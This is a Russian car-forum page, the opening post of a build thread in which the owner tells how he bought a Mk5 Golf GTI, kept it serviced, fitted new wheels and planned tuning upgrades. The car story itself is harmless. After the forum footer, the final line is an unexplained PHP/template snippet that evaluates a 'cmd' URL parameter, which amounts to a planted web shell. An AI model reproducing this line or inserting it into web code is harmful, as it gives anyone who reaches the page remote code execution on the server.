Показано с 1 по 10 из 155

Тема: Golf mk5 GTI by Буб


Древовидный режим

  1. #1
    GTI-Racing Буб has a spectacular aura about Буб has a spectacular aura about Буб has a spectacular aura about Аватар для Буб
    Регистрация
    01.11.2011
    Откуда
    Moscow
    Машина
    AUDI S3 8P Revo performance
    Сообщений
    691

    Golf mk5 GTI by Буб

    Делать что-то особо нечего прекрасным воскресным деньком, сделаю-ка я бортовик...

    Для начала представлюсь.
    Буб, Стас. По совместительству админ клуба Redliners. Не считая первый двух тазов - всю жизнь был верен автомобилям марки Honda, но всему видимо приходит конец :)...

    Последней каплей стала покупка летом 2011 года автомобиля Civic FN2 Type-R. Я не сказал бы что машина говно, но отчетливый аромат Английских фекалий она имеет...
    Пара слов о нём: Яркая, приметная, вроде очень даже рулящаяся машинка, достаточно комфортная... Но всё это прокатывает, если до нее у Вас была совсем старая Японка...
    Лично я УСТАЛ! Салон гремит как в тазу, сцепление адски жесткое что на стоке, что с карбоновым 2х-дисковым. Амики живут тыщ 50 и еще куча недостатков...
    Продал я его в середине октября 2011 года, не проездив и нескольких месяцев на нём.

    Цели покупать другую машину небыло, т.к. мы всю зиму планировали провести в Индии (что собственно и сделали успешно).
    От нечего делать начал листать авто.ру, знакомые ребята уже пересевшие на VAG давно начали перетягивать меня на темную сторону и смотреть я начал именно ГТИ и исключительно на МКПП.
    Тут моему взору попадается "мой" нынешний авто
    http://gti-club.ru/forum/showthread.php?t=17634
    Начинаю звонить, доставать хозяина... Человек оказался взрослый, с кучей своих дел, поэтому договориться о встрече получилось лишь на третий день переговоров (до этого накануне встречу пришлось отменить, т.к. человек был занят).
    Ну вообщем договорились на вечер, т.к. Москва, пробки и т.п.
    Я весь на нервах (ну сами знаете это чувство, когда что-то прикольное покупаешь и ждать уже не можешь). Но днём меня ждало дикое потрясение.
    Звонит хозяин и говорит, что приехали какие-то ребята и оставили залог :howl: !
    От полного шока меня спасла лишь его вторая фраза - что ребята взяли таймаут до субботы, подсобрать бабла (была среда вроде)!
    До конца недели я еле дожил... Уже снился мне этот гольф в прямом смысле... Постоянно говорил себе - если дождется меня, значит судьба и т.п.
    ...нервы нервы нервы...
    Наступила суббота, в строго назначенные 12:00 я набрал хозяину и тот сказал то, чего я и хотел: Ребята бабок не нашли - приезжай.:epti-work:
    Сразу сделал звонок другу, у которого такой же ГТИ, разбудил подругу (на ее авто ехали смотреть), умылись и даже чайка не попив прыгнули в авто и полетели, попутно захватив по пути друга моего.
    Приехали на место очень быстро. Ждём... И тут едет ОН :)... Белый, красивый, чистый...
    В машине трое. Хозяин (далее Илья), его друг и с ним еще подруга.
    Ребята сразу на нас произвели очень хорошее впечатление. На вид 30-35 лет, модно одетые (Европейские хипстеры такие. Не разноцветные дибилы, не пугайтесь). Самому Илье (хозяину) оказалось и вовсе уже под 40 лет.
    Машину он покупал сам, заказывал еще до появления первых ГТИ в РФ. Так что мой гольф с самой первой партии завезенной в Россию!
    Все ТО у диллера, все абсолютно накладные и прочее сохранилось (чеки на бензин, как сказано в объяве на авто.ру я уж не стал просить :) ).
    Внешнее состояние - отличное (сколы не в счёт), в салоне пахнет новой машиной и т.д. и т.п. Мотор приятно стрекочет, выхлоп не сечёт, лампочки все горят.
    Поехали прокатились по его району, он специально перелетел несколько лежаков на скорости. Всё оказалось просто в идеале!
    Вообщем я уже был готов на нем уехать сразу, но оставив залог пришлось ждать до понедельника. В субботу Илья снял его с учёта (номера не захотел 199е мне оставить), и в понедельник с утра мы уже оформили на мена ДКП.
    (это было 31 октября, а 30го мой ДР. Сделал себе подарочек)
    Далее куча эмоций, радости и прочего. Не передать.
    Вообщем так и стал он моим.

    Вот он после покупки



    Далее поездив неделю до отпуска на летней резине, хотя днем уже бывало -10 градусов - поставил его в гараж да даче, ждать меня...

    Первые впечатления: по ощущениям ГТИ овощ сраный, но это до тех пор, пока ты на спидометр не смотришь... Тут то и становится ясно, что он быстрее во всём, включая повороты, только ощущений в разы меньше левых гоночных.

    Далее погли месяцы на Гоа... Отдыхалось хорошо, даже скорее жилось, мыж жили там (и собачка с нами наша даже поехала). Поэтому не думал особо о гольфе своём, но душу грело, что летом будет чем заняться!

    С Гоа планировали приехать в марте-апреле, но не вытерпели в этом нарко-притоне более 2,5 мес и приехали в итоге в самое "пекло"... в -30 градусов.
    Еще до обратного вылета встал вопрос о том, как отколупать гольф с дачи, ибо у ворот гаража куча снега 2м и все во льду.
    Спасла бабушка - наняла таджиков и к моему приезду гольф уже был заперт только воротами :)!
    Вопрос с зимней резиной также быстро решился еще из Индии. У знакомого лежали почти новые 205-50-17 гиславед НФ5. Их я и забрал.
    (Авто мне досталось на ОЗах на летней резине и в нагрузку сток колеса, без резины. На них зиму и надел сразу)

    Пара фоток после возвращения:



    Забыл написать, что сразу же после покупки махнул масло. Поэтому до 108000 (взял с 100к) не парился.
    На 108000, уже в мае сделал новое ТО.
    Купил масла, фильтра итп + толкатель ТНВД и клапан PCV нового образца...
    Что скажу... скажу прямо - АВТОТРЕЙД МУ-ДА-КИ! Илья у них обслуживался каждые 7500км, а они ему не поменяли то, что должны были...
    Вот собственно фото, далее сами поймёте:

    Вал я не сфоткал, но внешне был без задиров. Время покажет...
    После замены толкателя машина полетела просто!

    В середине мая поставил авто на учёт (до этого с октября на транзитах гонял)... хз зачем, скорей для того, чтобы по всем базам машина стала уже моей на 100% :)... налог не парит особо (хонды 201+ сил на бабушку ставил).

    Небольшое отступление... Есть у меня знакомый, дисками торгует. Торгует с масштабом, поэтому и цены сладкие... Постоянно слежу за обновлениями у него.

    Далее: и тут снится мне сон - КЛЯНУСЬ! Что я захожу к нему в альбомы с колесами и там продаются ББСы по хорошей цене на меня...
    Ну сами знаете сны с утра уже после душа затуманиваются и не помнишь нихрена... Ну так и было... Но днём зашел все-же к нему и увидил их...

    Да, они объективно хуже OZ Ultraleggerra моих, но пох - хотел такого плана диски! А цена так вообще подкупила (16к)... Сразу звонок - и договорились когда привезет.
    Привез он их мне в 7 утра, а поставил я их уже в 2 дня... забив на работу :)
    Результат:


    Наступил Июнь... планы на него были заранее.
    В планах - кулер от S3, downpipe & чип.
    Все делаю у Амета в сервисе.
    Пробег 113 000 км.
    Кулер уже поставил + заменили клапан байпас.

    downpipe буду делать завтра (25 июня) - там же.
    А чип придется отложить на пару недель... Из-за неожиданной проблемы с регулятором давления наддува (http://gti-club.ru/forum/showthread.php?t=20457)
    Это кстати очередной камень в огород АВТОТРЕЙДа... Мы на старом датчике пытались оставшиеся трубки обломать спецом - х*й! почти нереально.
    Сломали его скорее всего при замене ГРМ, подклеили и так он и жил, пока байпаса клапан не махнули и не выдуло всё к ебен*м :))!
    В виду отсутствия Амета в Мск - проблему решал Влад с ауди-клуба. Спасибо ему огромное за это.
    Машина кстати похерачила еще гораздо лучше!

    Также прикупил уже еще один ништячок... ставить буду в середине июЛя. Пока и денег особо не осталось :). Заодно планирую сайленты нижние от S3 поставить.


    Ну пока вот-так вот... Отчёт по установке даунпайпа будет во вторник-среду!

    зы: ВАГ сила!
    А Type-R должен быть исключительно праворульным.

    всем пис! :encore:

    Добавлено через 8 минут
    Пара фоток вчерашних:




    Ну и рамки прикрутил наконец-то.. Спасибо BON-у!
    Последний раз редактировалось Буб; 05.12.2012 в 13:40. Причина: Добавлено сообщение

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}